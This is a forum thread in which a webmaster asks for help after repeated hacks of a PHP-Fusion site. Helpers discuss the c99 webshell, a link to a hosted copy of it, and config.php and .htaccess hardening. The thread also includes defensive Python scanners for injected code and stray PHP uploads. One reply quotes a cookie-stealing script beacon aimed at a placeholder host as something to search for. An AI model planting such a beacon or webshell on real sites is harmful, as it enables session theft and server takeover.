Site hacked! help find the reason and how to prevent it.

I seem to have had a few of these over the last few days; is it anything to worry about?

ACCESSED PAGE
http://www.01243.co.uk/infusions/guestbook/guestbook.php?rowstart=30

http://www.01243.co.uk/setuser.php?error=3
REFFERRING PAGE
http://www.01243.co.uk/infusions/guestbook/guestbook.php?rowstart=100&&DI=293&IG=4748c5f020264f7fb5741b30165b93e6&POS=54&CM=WPU&CE=54&CS=AWP&SR=54

210.123.182.13
ACCESSED PAGE
http://www.01243.co.uk/infusions/guestbook/guestbook.php
REFFERRING PAGE
http://www.01243.co.uk/infusions/guestbook/guestbook.php?rowstart=100&&DI=293&IG=4748c5f020264f7fb5741b30165b93e6&POS=54&CM=WPU&CE=54&CS=AWP&SR=54
USER AGENT DETAILS
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
This is also a way to block IPs:

$ip_banned = array("255.255.255.255", "0.0.0.0"); // IPs that are banned
$ip = $_SERVER['REMOTE_ADDR'];                   // visitor's IP address
foreach ($ip_banned as $value) {
    if ($value === $ip) die("You're banned!");
}

Write in your chosen IP address to ban. Put the code in theme.php
@Elactos : Or do it via blacklist using a better way :)
Well, the site got hacked again today and I have exactly no idea what to do next... I emailed the hacker asking for the bug he's using to hack the site... and I'm gonna stop working on the site till I find the error (I don't want my time and work to be wasted every day he hacks the site). Is there any known exploit in v6.01.6? He seems to be able to easily hack my account. I think it may be by creating a fake cookie and making the system think it's the admin... not sure though, but I'm sure he doesn't and can't hack the cPanel and is getting the MySQL pass from the files in the site... do you think encoding the config.php file using programs like phtml encoder can help?
Ask your provider for help. Maybe this is a security hole somewhere and other accounts are hacked too. If so, it's not a PHP-Fusion issue. If not, hm...
Do you have a keylogger on your computer? Is your computer safe? Is your host safe?

There are many things that could be causing this.

Quote

agl wrote:
Well, the site got hacked again today and I have exactly no idea what to do next... I emailed the hacker asking for the bug he's using to hack the site... and I'm gonna stop working on the site till I find the error (I don't want my time and work to be wasted every day he hacks the site). Is there any known exploit in v6.01.6? He seems to be able to easily hack my account. I think it may be by creating a fake cookie and making the system think it's the admin... not sure though, but I'm sure he doesn't and can't hack the cPanel and is getting the MySQL pass from the files in the site... do you think encoding the config.php file using programs like phtml encoder can help?

Hello, agl,

does the hacker still upload the webshell (the file c99.php)?

It's strange that he changed your MySQL and cPanel password.

If the hacker does all the job with webshells, I will try to help you stop getting webshells in your FTP.

And.. did you try putting the webshell c99.php into your FTP, opening it in your browser, and trying to see if it allows you to browse the server's system files etc.? Maybe the server is not secure?

Quote

do you think encoding the config.php file using programs like phtml encoder can help?

But you can decode it. :| Still, encoding may help.

There is a way to view the config.php file in the PHP-Fusion administration (Panels and Custom Pages). To stop it, try editing your config.php and maincore.php files:

In config.php put this line after <?php:

// Redirect direct requests to config.php (uses $_SERVER so it works without register_globals;
// exit stops the rest of the file from running after the redirect header is sent)
foreach (explode("/", $_SERVER['PHP_SELF']) as $d) {
    if ($d == "config.php") { header("Location: index.php"); exit; }
}

Do the same in maincore.php but use this line:

foreach (explode("/", $_SERVER['PHP_SELF']) as $d) {
    if ($d == "maincore.php") { header("Location: index.php"); exit; }
}

config.php should look like this:

<?php
// Redirect direct requests to config.php
foreach (explode("/", $_SERVER['PHP_SELF']) as $d) {
    if ($d == "config.php") { header("Location: index.php"); exit; }
}
// database settings
$db_host="***";
$db_user="***";
$db_pass="***";
$db_name="***";
$db_prefix="***";
define("DB_PREFIX", "***");
?>



--------------------------------
But it won't help you protect config.php if the hacker views it in a webshell. To stop the hacker accessing your files with a webshell, try to contact your webhosting and ask what chmod (file attributes) you should use (if there are any) to stop access to your files with a webshell, but keep the site working.
------------------------------------
Make sure that you updated your profile.php (http://php-fusion.co.uk/news.php?read...admore=361)

P.S. don't forget to answer my question:
does the hacker still upload the webshell (the file c99.php)?
Thanks a lot for your help Zilvinas. He used the c99.php file only the first time. The next times he just went to "/setuser.php?error=3" and "/setuser.php?user=agl" and then administration etc. (he checked to see if c99.php is there but got a 404 error...)

And I uploaded the c99.php to the server and ran it and wow... I was laughing for a while about how easy and feature-rich that script is... I'd better stop using cPanel's file manager and start using that script instead... it has a file manager where you can view (even in hexdump), download, delete etc. the files. Nice interface! You can do different attacks etc. though I'm not sure how they work. I didn't know hackers use such scripts... I always thought they sit at their comp looking at difficult code and hack a site... anyway.
You can view that script by going here:
http://www.hentai-enishi.com/forum/attachments/c99.php (please don't delete my files and don't hack the server ;) )

Please, can anyone tell me what I should do to stop this kind of attack?

And again, the hacker only used the c99.php file the first time. He has hacked 3-4 times by now and just used it the first time. Not sure if he changed something else the first time in order to hack it again though...

I removed that file from attachments since it's a dangerous script :D
Btw I know the server admin, so if you think something should be changed in the server settings let me know. And I'm thinking the best way is to ask the admin to delete this account and make a new one for me from scratch... tell me if you have any other idea. Thanks in advance
Yes, try to make a new account, check all files (or upload a new PHP-Fusion and restore the database). Maybe the hacker spread the c99 webshell around your FTP so he doesn't need to upload it again to /forum/attachments. I checked the directories (with your c99) that have 777 attributes, but didn't find it.

Maybe he put the c99 webshell into your FTP, then looked at your config.php, connected to the MySQL database and put some sniffer code into your site's panels, news etc. so that he doesn't need to put the c99 again.

Well, you can think of many versions of how he hacked your site.

So I recommend you:
Check panels, latest news (or open your whole MySQL DB in txt) for code like this:

<script>img = new Image(); img.src = "http://www.website.com/s/s.jpg?"+document.cookie;</script>

Also I will translate an article from my site to English about .htaccess protection and locking the Admin Panel (to stop getting webshells). I will put the link here today. And don't create a new hosting account if you haven't put in the .htaccess files that I will give you. After creating the hosting account and putting the .htaccess files in place we will see if he can still hack into your website.
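As an added check for the advice above (this is example code written for this thread, not code from PHP-Fusion or from any poster), here is a small Python scanner that runs over a mysqldump text export of the panels and news tables and flags rows carrying the kind of injected cookie beacon shown, plus a few related patterns. The table names and the sample dump are constructed; a hit means "review this row", since some legitimate panels do contain scripts.

```python
"""Scan a MySQL dump (or any text export of panels/news) for injected
client-side code such as a cookie-stealing image beacon.

Example code for this thread, not PHP-Fusion code. Table names and the
sample dump are constructed; pass a real dump file as the first argument.
"""
import re
import sys

# Patterns that indicate injected client-side code. The first three cover the
# <script>img=new Image(); img.src="...?"+document.cookie;</script> form from
# the thread; the other two catch common variants. Dump text escapes quotes
# as \" so an optional backslash is allowed before the quote.
SUSPICIOUS_PATTERNS = {
    "script_tag":       re.compile(r"<\s*script\b", re.IGNORECASE),
    "cookie_access":    re.compile(r"document\s*\.\s*cookie", re.IGNORECASE),
    "remote_image_src": re.compile(r"\.src\s*=\s*\\?[\"']https?://", re.IGNORECASE),
    "iframe_tag":       re.compile(r"<\s*iframe\b", re.IGNORECASE),
    "js_eval":          re.compile(r"\beval\s*\(", re.IGNORECASE),
}

# mysqldump writes rows as: INSERT INTO `fusion_panels` VALUES (...);
INSERT_RE = re.compile(r"INSERT INTO\s+`?(\w+)`?", re.IGNORECASE)


def scan_dump(text):
    """Return one finding per suspicious line: (line_no, table, [pattern names])."""
    findings = []
    table = None
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = INSERT_RE.search(line)
        if m:
            table = m.group(1)  # remember which table the row belongs to
        hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(line)]
        if hits:
            findings.append((line_no, table, hits))
    return findings


def scan_file(path):
    """Scan a dump file on disk (read leniently: dumps may mix encodings)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_dump(fh.read())


# Constructed sample dump: a clean panel, a panel carrying the cookie
# beacon, a news item with a hidden iframe, and a clean news item.
SAMPLE_DUMP = """\
INSERT INTO `fusion_panels` VALUES (1,'Navigation','<ul><li><a href=\\"news.php\\">News</a></li></ul>','left',1);
INSERT INTO `fusion_panels` VALUES (2,'Welcome','<p>Welcome!</p><script>img = new Image(); img.src = \\"http://www.website.com/s/s.jpg?\\"+document.cookie;</script>','right',1);
INSERT INTO `fusion_news` VALUES (7,'Site update','Server moved.<iframe src=\\"http://www.website.com/x.html\\" width=0 height=0></iframe>',1);
INSERT INTO `fusion_news` VALUES (8,'Hello','Plain text news item.',1);
"""

if __name__ == "__main__":
    results = scan_file(sys.argv[1]) if len(sys.argv) > 1 else scan_dump(SAMPLE_DUMP)
    for line_no, table, hits in results:
        print(f"line {line_no} table {table}: {', '.join(hits)}")
```

Run it against the dump of the whole database rather than single tables: the thread's point is that the attacker can have written to any row he could reach with the database password, not only panels and news.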
I checked my DB backup and there's no code like that in it. Looking forward to your .htaccess files. For now I've removed the c99 file from the server. I will take a backup of my download files and ask the host to delete this account.
Btw here's the hacking thread of my site from the hacker's website (hcegroup):
https://hcegroup.vn/forums/showthread.php?t=1590
If someone can understand what the bug is from that site please let me know ;)
I think they speak Vietnamese. We should get a translator. I tried to google it but no luck, most companies are translating for money.
np. thanks a lot for your help ;)
I see, the site is back again. Were there any more hacking attempts? If you use the .htaccess files that I gave you, still check forum/attachments and images/avatars for .php files regularly, just to know if they try to do something. If your site gets hacked again, say it here, I would like to know.
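As an added sweep for this advice (example code written for this thread, not code from PHP-Fusion or from any poster), a Python script that walks the upload directories named above and reports anything that could run as PHP: a PHP extension anywhere in the file name, a PHP open tag inside a file with an image extension, and stray .htaccess files in an upload directory. The sample tree is constructed in a temporary directory; on a real server pass the directories as arguments.

```python
"""Sweep upload directories (forum/attachments, images/avatars) for files
that could be executed as PHP.

Example code for this thread, not PHP-Fusion code. The directory names come
from the posts above; the sample files are constructed in a temp directory.
"""
import os
import sys
import tempfile

PHP_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}
PHP_TAGS = (b"<?php", b"<?=")


def classify_file(path):
    """Return a reason string if the file looks executable as PHP, else None."""
    name = os.path.basename(path).lower()
    if name == ".htaccess":
        # Uploads should never carry their own .htaccess; review any that appear.
        return "htaccess in upload dir"
    # Check every dotted segment so double extensions (shell.php.jpg) are caught.
    for seg in name.split("."):
        if "." + seg in PHP_EXTENSIONS:
            return "php extension"
    with open(path, "rb") as fh:
        head = fh.read(4096)
    if any(tag in head for tag in PHP_TAGS):
        # PHP code hidden behind an image or text extension.
        return "php open tag in content"
    return None


def sweep(roots):
    """Walk each root and return sorted (relative_path, reason) findings."""
    findings = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for fname in files:
                full = os.path.join(dirpath, fname)
                reason = classify_file(full)
                if reason:
                    rel = os.path.relpath(full, root).replace(os.sep, "/")
                    findings.append((rel, reason))
    return sorted(findings)


def build_sample_tree():
    """Constructed upload tree: two clean files and three that should be flagged."""
    base = tempfile.mkdtemp(prefix="fusion_uploads_")
    att = os.path.join(base, "forum", "attachments")
    av = os.path.join(base, "images", "avatars")
    os.makedirs(att)
    os.makedirs(av)
    samples = {
        os.path.join(att, "notes.txt"): b"just a text attachment\n",
        os.path.join(av, "agl.jpg"): b"\xff\xd8\xff\xe0 constructed jpeg bytes",
        os.path.join(att, "c99.php"): b"<?php /* webshell body omitted */ ?>",
        os.path.join(av, "smile.gif"): b"GIF89a<?php /* php hidden in an image */ ?>",
        os.path.join(att, ".htaccess"): b"# constructed: any .htaccess here needs review\n",
    }
    for path, content in samples.items():
        with open(path, "wb") as fh:
            fh.write(content)
    return base


if __name__ == "__main__":
    roots = sys.argv[1:] or [build_sample_tree()]
    for rel, reason in sweep(roots):
        print(f"{reason}: {rel}")
```

Run it from cron and compare the output with the previous run; a new finding in attachments or avatars is the early warning the post above asks for, well before the site is defaced again.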
I hope it won't get hacked again. Good luck with your site!